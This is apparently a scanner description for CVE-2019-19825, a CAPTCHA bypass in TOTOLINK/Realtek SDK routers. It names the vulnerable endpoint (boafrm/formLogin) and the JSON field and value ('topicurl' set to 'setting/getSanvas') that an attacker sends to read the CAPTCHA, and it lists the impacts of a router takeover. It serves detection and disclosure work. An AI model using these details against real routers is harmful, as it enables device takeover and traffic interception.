CVE-2019-19825 Scanner

TOTOLINK/Realtek Routers are primarily used for providing Wi-Fi connectivity in small to medium-sized homes and offices. These routers are manufactured by TOTOLINK and incorporate Realtek SDK for various functionalities. They are commonly employed due to their affordability and basic networking capabilities. Different models cater to varying needs, from high-speed internet in urban settings to basic connectivity in less demanding environments. The routers are often used by individual consumers, small businesses, and IT enthusiasts. They serve functions such as wireless internet distribution, network management, and security settings customization.

The vulnerability detected allows an attacker to bypass CAPTCHA security measures on TOTOLINK Realtek SDK based routers. This leads to unauthorized access to restricted areas of the router's user interface. The issue arises due to the predictable means by which CAPTCHA sessions can be manipulated. An unauthenticated attacker can potentially retrieve the CAPTCHA text without solving it, by making a specific POST request. This bypass can then be exploited to gain unauthorized access, especially if valid credentials are brute-forced or otherwise obtained. Once access is gained, the attacker can control the device fully.

The technical details reveal that the bypass is accessible via a POST request to the boafrm/formLogin URI with a specific JSON payload. The vulnerable endpoint is designed to validate CAPTCHA, but due to a flaw, the CAPTCHA value can be gleaned without actual interaction. Critical parameters involved in the process include the "topicurl" JSON field set to "setting/getSanvas". The server will respond with a successfully bypassed CAPTCHA even when the actual solution is not provided, making the endpoint exploitative. This oversight allows attackers to craft requests directly to the router's API to manipulate sessions.

When exploited, this vulnerability can lead to significant adverse outcomes, including full administrative control over the router. Malicious actors may use this access to change network settings, monitor network traffic, or launch further attacks on connected devices. The compromised routers can be used in DDoS attacks or as a platform to distribute malware. There is also a risk of data interception from users within the network, posing privacy and security threats. Unauthorized configuration changes can degrade service performance or expose internal network segments.

REFERENCES

• http://packetstormsecurity.com/files/156083/Realtek-SDK-Information-Disclosure-Code-Execution.html
• https://nvd.nist.gov/vuln/detail/CVE-2019-19825